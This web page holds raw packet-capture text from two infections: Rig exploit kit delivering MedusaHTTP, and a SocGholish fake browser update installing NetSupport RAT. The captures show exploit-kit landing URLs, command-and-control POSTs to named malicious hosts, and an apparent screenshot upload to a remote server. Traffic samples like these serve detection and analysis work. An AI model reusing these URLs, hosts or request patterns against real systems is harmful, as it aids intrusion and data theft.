Text Example

Rig Exploit Kit EK Loads MedusaHTTP Malware Trojan Backdoor Flash Exploit PCAP File Download Traffic Sample

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 16:57:48.518651 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [.], ack 737, win 64240, length 0
E..(.a….^…%s
..e.P……..U.P…. ..
2019-08-12 16:57:49.127786 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [P.], seq 1:1277, ack 737, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$.b….Y…%s
..e.P……..U.P…cL..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 12 Aug 2019 20:57:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 45973
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2019-08-12 16:59:38.271526 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268: HTTP: POST /forums/members/api.jsp HTTP/1.1
E..4..@…..
..e.w…..P.R.az.e.P….%..POST /forums/members/api.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Host: cdnshop78.world
Content-Length: 192
Expect: 100-continue
Connection: Keep-Alive

2019-08-12 16:59:38.271686 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 269, win 64240, length 0
E..(.b….o{.w..
..e.P..z.e..R.mP….O..
2019-08-12 16:59:38.626952 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 269:461, ack 1, win 64240, length 192: HTTP
E…..@….B
..e.w…..P.R.mz.e.P…….xyz=Jn72I3lUOoD6/K%2BBOVBU21CCWaMR0pT/MMMybhkcYzKf0Fxhd5iX/gM81s2/ry7/68WwIwZcdWQ6itJCp/2EjmcHZrxDMiwaQmK6aOtIdjcivuIb26kGZv0gTBGSgrc2LVstLUlWLVstMl4VcmXCxtXRM%2Bb999Q62gnpsw9gRcO404kDv36jb7g=
2019-08-12 16:59:38.627077 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 461, win 64240, length 0
E..(.c….oz.w..
..e.P..z.e..R.-P…….
2019-08-12 16:59:38.701682 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 1:26, ack 461, win 64240, length 25: HTTP: HTTP/1.1 100 Continue
E..A.d….o`.w..
..e.P..z.e..R.-P…N[..HTTP/1.1 100 Continue

2019-08-12 16:59:38.807386 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [.], ack 26, win 64215, length 0
E..(..@…..
..e.w…..P.R.-z.f.P…….
2019-08-12 16:59:39.444787 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 26:381, ack 461, win 64240, length 355: HTTP: HTTP/1.1 404 Not Found
E….f….n..w..
..e.P..z.f..R.-P…)m..HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 13 Aug 2019 00:59:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.39

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=hea
rtfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspV
WdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvP
aqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqk
mbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 18:02:50.728872 IP 10.8.12.101.49205 > 195.22.26.248.80: Flags [P.], seq 246:434, ack 26, win 64215, length 188: HTTP
E….j@…./
..e…..5.P!p…)iiP…….xyz=Rdbf7Sz9YfcZXmTqimFyqnuXh9Qh2EokgRxWjlW6eKlVYMP/0Ie66coOHRDqh72wYWFpR4xyzrqwauM0ArlQyO1qB/flAxIl7E5s3wAGYyWQvmPGYIc2JkmQEzK0NIxSLVstLUlWLVst5B2FNeT80ZFfKTucqMUWcv06uvZYrUmVLNhFF/hGmbs=
2019-08-12 18:02:50.729083 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [.], ack 434, win 64240, length 0
E..(……K_….
..e.P.5.)ii!p.aP….~..
2019-08-12 18:02:50.900794 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [FP.], seq 26:283, ack 434, win 64240, length 257: HTTP: HTTP/1.1 200 OK
E..)……J]….
..e.P.5.)ii!p.aP….F..HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Aug 2019 22:02:47 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=98d119f0da644d3d3e6a3eec09296b9b|173.166.146.112|1565647367|1565647367|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

Google Chrome FAKE Download Update Malware SocGholish campaign loads NetSupport RAT PCAP File Download Traffic Sample

2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37)
E..A.O……
..e
…._.5.-……………mysocalledchaos.com…..

2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1, win 256, length 408: HTTP: GET / HTTP/1.1
E….d@…..
..e.>o@…P.9…C.&P…….GET / HTTP/1.1
Host: mysocalledchaos.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en

2019-08-26 15:03:39.075406 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 17917:19120, ack 14190, win 451, length 1203: HTTP
E…….1.[S….
..e.P.>..Y,n.?xP…0…783dd8ca1563a9aa539aeb4137359091b485d367b384986c694f6d23061f3cb4dcbc61373d9f6e6b7a2d195873694c3dd98a63e44b3cb5dcd935a1d2d3f2d485d2e6a784996c3226759f9aa0c34b2c9c61373011859485c2724193dffb5b8d1c87251f3cb4d4b39ec8c260b19485d5a7b384997c993f9d26f23969e04a5b21673590919b7a2d1957a499653ccd8a60253a0a223acaa76735b0919e84c6e6a7c41d3bba9fdc8623097c94fcbc61373ed18594859282e173cf4afb899a4065537da0dcbc217303664694b5f2e6a784942d29d98a20e1686b93faea8700a5d0b19485d2e82690996c6d6cbce6927879839b9af7d14a60b19b44c6e6a6c40c682b3ebcf453d92b97ddb86137159091948493c2a785d9f938af1c263169baa3f87d653735b0919485d0278384995cb9fe1d263179ca421cbc61373d9f6e6b722067838499385bcf4d56351a7b938aec0400a2a7d7c255f2e6a245bd6c3de90f16927978922a4aa1173590999b7a2d115205bd6c3d8dec76a2696cf19b9b376750a706a3c38436878491ad19d98a50e199ca52a89a97c1f5d091948ddd19587361ed19d98a340349fb828cf9261063c0f4a312e5a0f154b96c3618ae60647f5b839b9af7d145b091948913c2a78429c94b4fcc3552181a223acc4137359e90b085d24603927e5aa8eecd46f3b94cb4dc9c6e7611909154f0b4f181128f8b7df98a60246b3cb41c1897f160f686b213c401e7a4996c3c58be60646f59f0ea7a76000d11659485f2e6a78658583dd99a14e07b6981887921773590999b7a2d1157a49d2d09d98a80301b49e048fd61373590919485d2e6e78499627cd

2019-08-26 15:03:39.075745 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 19120, win 256, length 0
E..(..@…[.
..e…..>.Pn.?x..].P………….
2019-08-26 15:03:39.168023 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 19120:20580, ack 14190, win 451, length 1460: HTTP
E…….1.ZQ….
..e.P.>..].n.?xP…….1000
d8a60655f3cb4fc982227159c509085d2a6a784994c199aaa40699e38b4dcdc613735b0b5d7b5f2e6a784996cbdd98a60457b7ff4fcbc41376590229861d2e665e26e69c98e9d367399abf34cbc6136319091b5a1d3d2a784ddaa6bbeca40647b3d80dcbc3411a3e616d4a5d2c6a73510a89dd96806925ac8223aeb7661235606d315d2e6a680996c1cfd8b54655f78728adb211734b490a085d2b38112efeb7df98a4065ceb5707cbc3561e297d60485d6e79384996c1dd91be9a1ff3cd0eb9a372073c0919084e6e6a7a4b96c3dd98a2423487aa4fcbc613631909100a34492f162dffa2b39aa60455fad3d181c615302b6c783c382e6a385ad6c3de8e121615f3cf09aab272715909fd581d2e61391ae2a2afecef683196b34fcbc613631909100a34492f162dffa2b39aa60455f3cb4d5bd253734d064901335a0f0a2ff7a0b8ddc872278a63598bc6117359a50d085d20652c00f8b7b8eac06736968e23bfb46a6f590919485d2e6a784d96c3ddd8b54655f3cb4dcbc4103a104d1b485d3f2a785996c3dd9aa0500192a921aec413ef4949195c5d2e6a7a4edf8cbbfed56321f1cb3dda86136b5909194a5767070825d1a6a9ecc37457f3c94dcbc60f6619090d470d67040c2ce4a5bcfbc3523491a728ffd353735b091970486e6a7646c28ab3ecc3743392a8289fa7711f3ccd5c4c5d2e6a784996c1dd98a69a45b3cb4dcbc61371534c773c2f5729173cf8b7df98a60655f3cf4dcbc611741c676d3a344b197a4994c3dd98a68e40b3cb43cc925e162d61762c552e6a784996c3dd98a40655f3cb5c8bc6137359091b4c1e410e1d4b96c3ccd8a60255f3cb4fcf827207380b194a5d286a73510a89dd94806925ac8e3cbea77f1a2d7019485d3e2a784b8447c8d8a6021996ad39c9c601f74c49194d0f470d103d94c3df98ad1ec9b9cb43eda9632c10677c39284f06113defc3dd98b64655f1d9c9de861377156c7f3c5f2e78fc5cd6c3d8cacf613d87c94dc9c6186bc54319
2019-08-26 15:03:39.168037 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 20580:22040, ack 14190, win 451, length 1460: HTTP
E…….1.ZP….
..e.P.>..c.n.?xP…;…477b411a270ee4a6bcecc374019baa23cbc6136319091b5ad93b2a784ddaa6bbeca4064777de0dcbc3411a3e616d4a5d2c6a73510a89dd8e806925ac8c3faea767162b5d71293361183d38e3a2b198a60645b3cb4fd9420633590d552d3b5a68785b12d69d98a3543c94a339c9c61173521185025d224c1739c98fb8ebd5523d92a54dcbc60333590b0bcc486e6a7c05f3a5a99aa614d1e68b4dce947a14317d1b485f2e6160d5dcc3cebec9760abfae3eb8927b1237466b0d2c5b0b144996c3cdd8a6044777de0dcbc25f163f7d1b484faa7f38499391b4ffce7257f3c94da3d15373590919485d2e6a784996c3dd14b94655f3cb4dcbae0433590919485d507238499ec3dd98a60655f303108bc6c32e190935281d2e4e18099687bdd8a64e35b3cb01ab86133339491920016e6afc15d6c365c4e60655f3e94d4dde53731d09edb7f1362a780b96372248be4655b1cbb9343f0b33594a19bca219733849d4c32967c01f15f3894d3f399c6a19095a48a9d1a961099680dd6c59fa4cb3cb0ecb32ec544349190b5dda952853d6c39e9852f929e98b4d88c6e78ce11359481e2e9e87ba8c83dddba6f2aaddd00dcb851387a67d02085d6d6a8cb627d89d98e406a10c20568bc65173adf63c541d2e2878bd69a8c1d8a645550734e4d786133059fde692416e6a3b49623cd085e60616f33fb28adb53731309ecb729332a780396352207bb4655b9cbba34140e33594319b0a203743849dcc32467f81815f3814d31399c6d19095348a6d1a266099689dd6459014ab3cb06cb3bec41464919025dd0952656d6c3909859f955f3cc1984a479163a7d3f48c5722a784fd5b1b8f9d26356f3cb4dcbc61b73580191571d2e6a784dc5a6b1fea40657f3ef4d039a53735d4f6b2d382d6a784996c3d598a70eddec8b4dcbc617203c657f4a5d2c6a51498e5f9798af423c80bb22b8a35c155a0919485d2e6278489e4bc2d8a60655f79828a7a011735b09274889722a7845dfadb4ecef682687aa23a8
2019-08-26 15:03:39.168042 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 22040:23224, ack 14190, win 451, length 1184: HTTP
E…….1.[c….
..e.P.>..iGn.?xP…X…a31073d1165948552e68784996c3dd98a6020696a72bc9c61373484919495d2623163ae2a2b3fbc30455f1cb62cb924e3359065a24384f040d39dfadaeecc7683696c84dcbc6137351091840d5312a784996c78efdca6057f3c94de2c60bef1309100b314f190b1defb3b89ba61246b3cb45cbc71bfb464919485d2a391d25f0c1dd9aa632553b900dcbcf501f387a6a063c430f7b492ed19d98ae0657f3cb4dcbc613735d5a7c243b2c6a38f18483dd99a60754f1cb4fcbff1393024919431e420b0b3ad8a2b0fdef7556f3cb5d8bc61b735b0919485d2e6a784dc5a6b1fea406574bd90dcbc713771768742d5f2e687862969f81d8a60d169faa3eb89672013c676d4b5d3a7938499ec3dc98a60655f3cb4dcf95761f3f0b194a5d076a6429d6c3d4dbca6726808223ada9107359185948552e6b784996c3dd98a6020696a72bc9c61173750901d4172e663127e5b7bcf6c563069ab128c8c68f63190911485c2e6a784996c3dd9cf5633995c94dc9c62f7351695948516704102ce4aaa9ebe0743a9ec84dcbd6537351091b485d2e6a784996c78efdca6057f3cb59d8861372590f580b314f190b4b96c1dda3a6f635b3cb4086a3671b366d582c395c0f0b3a95c3dd89e6065df3c94dcbc6137359091d1b38420c7a498427ccd8a60755f7852ca6a311735b092248294f2a7844dba6a9f0c9621497af3faeb56070590908085d266a7a4996c3dd98a60651a0ae21adc41371e11b59485c2e6e3628fba6df98a40613f3572c8bc6193e3c7d712739600b152c95c3658ae6065df3c84dcbc6137359091d1b38420c7a4996c3ccd8

2019-08-26 15:03:39.168046 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 23224:24684, ack 14190, win 451, length 1460: HTTP
E…….1.ZN….
..e.P.>..m.n.?xP…’F..1000
a60755f48a29afb476002a0b1908e53c2a784b96c2dc9aa60455cecb55578c1361087c78243448031d2dd5afbcebd548349eae4ecb7e01335901194a5d2e6a784996c3d9cbc36a33f1cb0d73d45373580918495f2e687873962bbcd8a60a139aae21af8777172b6c6a3b5e2e6a690996cbdd9aae8e4ab3cb4dcbc24016356f1b484fca7b384997c3d9d6c76b30f1cb4fcbfc132f3b4919441b470f142dd7a7b9eac37526f0cb4dda86137b590b11c0426e6a78499290b8f4c00455f1735f8bc612735d477825382c6a7a49d0c309c5e60659b4ae3982a867162b6f782b382d6a7859d6c3d598a50eddec8b4dcbc617203c657f4a5d3c2a6b0996c2dd9bef4f11f1cb6dcbc613735b091a073f4468784b96fddd18f84655e28c28bf8f7d073c7b7f293e4b2f163de4bade982a1215f3c34dc9c6137359091948597d0f142f94c3cfd8b54655f2cb4e828f5771590b19795d36f632498784b8ecef682196b92baaa57627386b752d5e2e726d0996cbdd99a60655f3cb4dcbc24016356f1b485f2e59788dc883dd90f3683c87852ca6a31073e11b5948552e68784996c3dd98a6020696a72bc9c653cb4b4919495d2f6b7a4994c3e998be9a1ff3c218a5af67203a66692d5e2ed26a0996cbdd9aa60655f3cb4dcbc24016356f1b481d9678384997c3dc99a40657f3f84d039b53735f4c683d3c42197b4996d39d98ae0657fb43528bc613735d5a7c243b2c6a70c18983dd99a6051a91a14fcbc4135859d944085d252d1d3ddea2aef0e5693196c84d57d6537351091840d5312a784996c78efdca6057f3c94df8c63f131909111c327d1e0a20f8a4de981e1415f3c34dc9ce9b6c19091948597d0f142f94c39d20b44655f2cb4ccac413715952196c3d6e6a691af7a5b8dbc76a39b6b32eaeb6671a36671a48753d2a784196c0d510b94655f3cb4998a37f155b0911c0426e6a79499a86a5fbc37621bca927aea56771590919591d…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:18.005975 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8959766, win 3626, length 0
E..(..@…M.
..e…..>.Pn.Bf.A.EP..* y……..
2019-08-26 15:04:18.016420 IP 93.95.100.178.80 > 10.8.26.101.49204: Flags [F.], seq 13215, ack 336, win 473, length 0
E..(V|..5.H.]_d.
..e.P.4vO….:.P….n..
2019-08-26 15:04:18.016640 IP 10.8.26.101.49204 > 93.95.100.178.80: Flags [.], ack 13216, win 256, length 0
E..(..@….W
..e]_d..4.P..:.vO..P….G……..
2019-08-26 15:04:18.037966 IP 93.95.100.178.80 > 10.8.26.101.49205: Flags [F.], seq 6011, ack 365, win 473, length 0
E..(…5.B.]_d.
..e.P.58._.DT.P....z.. 2019-08-26 15:04:18.038169 IP 10.8.26.101.49205 > 93.95.100.178.80: Flags [.], ack 6012, win 256, length 0 E..(..@....V ..e]_d..5.P.DT.8.`P….S……..
2019-08-26 15:04:18.051835 IP 93.95.100.178.80 > 10.8.26.101.49206: Flags [F.], seq 343, ack 408, win 473, length 0
E..(….5..S]_d.
..e.P.6..0…..P…V…
2019-08-26 15:04:18.052044 IP 10.8.26.101.49206 > 93.95.100.178.80: Flags [.], ack 344, win 255, length 0
E..(..@….U
..e]_d..6.P……0.P…Wb……..
2019-08-26 15:04:18.568546 IP 93.95.100.178.80 > 10.8.26.101.49207: Flags [F.], seq 16499, ack 424, win 473, length 0
E..(.B..5…]_d.
..e.P.7q5jo.n..P….L..
2019-08-26 15:04:18.568555 IP 93.95.100.178.80 > 10.8.26.101.49209: Flags [F.], seq 16623, ack 424, win 473, length 0
E..(z…5.$.]_d.
..e.P.9…FV[..P…….
2019-08-26 15:04:18.568559 IP 93.95.100.178.80 > 10.8.26.101.49208: Flags [F.], seq 15919, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.8(…I…P…u”..
2019-08-26 15:04:18.568563 IP 93.95.100.178.80 > 10.8.26.101.49210: Flags [F.], seq 16511, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.:S.c…4.P…]…
2019-08-26 15:04:18.568814 IP 10.8.26.101.49207 > 93.95.100.178.80: Flags [.], ack 16500, win 256, length 0
E..(..@….T
..e]_d..7.P.n..q5jpP….%……..
2019-08-26 15:04:18.568842 IP 10.8.26.101.49209 > 93.95.100.178.80: Flags [.], ack 16624, win 256, length 0
E..(..@….S
..e]_d..9.PV[…..GP… ………
2019-08-26 15:04:18.568850 IP 10.8.26.101.49208 > 93.95.100.178.80: Flags [.], ack 15920, win 256, length 0
E..(..@….R
..e]_d..8.PI…(…P…u………
2019-08-26 15:04:18.568856 IP 10.8.26.101.49210 > 93.95.100.178.80: Flags [.], ack 16512, win 256, length 0
E..(..@….Q
..e]_d..:.P..4.S.c.P…]………
2019-08-26 15:04:19.288443 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [P.], seq 3947:3986, ack 89439, win 821, length 39
E..Oa-..T.d…]#
..e…0.m… D.P..5z…….”…
;.s+2..,…..+,……j….0..Y
2019-08-26 15:04:19.288452 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a…T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.288696 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [.], ack 3987, win 253, length 0
E..(..@…=2
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.288940 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [F.], seq 89439, ack 3987, win 253, length 0
E..(..@…=1
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.289444 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a/..T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.302333 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [.], ack 89440, win 821, length 0
E..(.k..T…..]#
…skipping…
2019-08-26 15:04:19.967401 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [P.], seq 1:119, ack 1, win 258, length 118: HTTP: GET /location/loca.asp HTTP/1.1
E…..@….
..e>..#.@.P.@..~b#.P…….GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:04:20.126241 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [P.], seq 215:521, ack 655, win 254, length 306
E(.ZrF..n.o=.+.Z
..e…?…….!P…l…HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r.. .…W.h.E..=I….=n~…….7s.4…}.X…),.,.Dq.,…..()4.]..%y-A9H=n .:!…b<D…c…)=@UX.u….8+.t_A…R..b..’h[.T…jI

2019-08-26 15:04:20.134779 IP 62.172.138.35.80 > 10.8.26.101.49216: Flags [P.], seq 1:276, ack 119, win 258, length 275: HTTP: HTTP/1.1 200 OK
E..;9…q.”S>..#
..e.P.@~b#..@..P….?..HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Set-Cookie: ASPSESSIONIDSQTTAQAS=JMCCAGKBFCGMCLKBAJJGPDLL; path=/
X-Powered-By: ASP.NET
Date: Mon, 26 Aug 2019 19:04:18 GMT
Content-Length: 1

,
2019-08-26 15:04:20.135084 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [.], ack 276, win 257, length 0
E..(..@….~
..e>..#.@.P.@..~b$.P…[d……..
2019-08-26 15:04:20.327276 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 655:927, ack 521, win 258, length 272
E..8..@…r.
..e.+.Z.?…..!…(P…….POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 179.43.146.90
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=l3.<(T{.E…..V….k.9|||$(m..$Cj_……..0Mt..s…M.6..

2019-08-26 15:04:20.570080 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [.], ack 927, win 253, length 0
E(.(rG..n.pn.+.Z
..e…?…(…1P…Td..
2019-08-26 15:04:20.627030 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:…y………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.675976 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:.
.{………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.727322 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 927:1217, ack 521, win 258, length 290
E..J..@…r.
..e.+.Z.?…..1…(P….b..POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Host: 179.43.146.90
…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:26.662060 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8960053, win 3624, length 0
E..(.B@…Ln
..e…..>.Pn.G..A.dP..(……….
2019-08-26 15:04:30.427725 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [P.], seq 409336:409766, ack 8960053, win 3624, length 430: HTTP: POST /1×1.gif?ss&ss2img HTTP/1.1
E….C@…J.
..e…..>.Pn.G..A.dP..(….POST /1×1.gif?ss&ss2img HTTP/1.1
Accept: /
Accept-Language: en-us
Age: a17316821ea1038c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 979879f9.user3.altcoinfan.com
Content-Length: 385714
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:03:01.423467 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 468
E….s@…..
..e.. ..7…..K@:..k..$b……#…[.!….l.X...#.Fdg3..GZ.3q'\].#K..d.u..h.,.4.V..GP.....2z2..T.b[>.8.=^."$.n>m....V.c......f..H..Z...0b....9.>.........(......rV=L~.....m-...0M|.D+.....M.@...-..OA.#..3V7....<.K...,s_..iwk...kyK..S..r=....6......Y..L......|.L.I.........q6...."{v.....)%.g,.@.....]*$.....V.../.ZUD..U.+...6.&+![..aM....d.b.4D.......(."K...?....G..z.).k.c"...!cX.$6I.... ..%…>Z$.r…..S.d.ck.[…..:D..5….jY=.rj.. p ..1…Q..H_……!…zt..……Q.. O..a.…. 2019-08-26 15:03:01.423995 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 1010 E….t@…#. ..e…........@.<4........ZL...;..!..@.S..!...s....2(.Bk2.m..f}.....8A..8……~.WG..S….……….}.#.v7..z5′.]..xn.x……._?..1.)..t.k8S..Y..O0Q. W.k….h.P.c…o…?4. ….Ih….A..J.jc…..x..l.D[.]a...8.M..7/&d.V./.Y...9._l....R]F..6....H..\k&..+......:.3ul.n.B.#=.....[Mw."P...Z.E..p2X.1[Be.n..=-4(V..%..VsdL...1..?..2^3.....R.........A....h.@m....&1])_x.....Lx.[e...s[.....;.2B+.qL..V..W...@TM..P..h-..R.|........1..%...d.qOm..i.}..?'..w.n"{.j.}P........;)X4...t.B..3........:..dUhQ.....;.....^.#w.e.,.@b8.DZh.1.D....@...W$~....?.....,.H.l.......n..$.+..H.$..NC5?..N...i.V..rx......8..g.$.;.=g2.....(..+.\.G.dXb.dQ.QU.....o......0.i(<.n#3...ube..q*l.wx...N!:51...{..z[......{2 8R4G.c'5.....Y;.:.0.e.-.]..Je....95..L.F#).)..@g.3&a.sg-.........S0..<|n..=....."$"D..>bE.?S.>..Y....)q. .e.F.Y2^...4......Y^..71t......4.p..v....s .h...xK>./.......d...j.>.zv[..n...M4J,..zJA.L....E.....B*. 2019-08-26 15:03:01.472993 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8.x@....M ..e.. ..7...$..@:..k..$b.S.c...$....lhZW_.. 2019-08-26 15:03:01.473493 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28 E..8.y@...'i ..e.....…$. 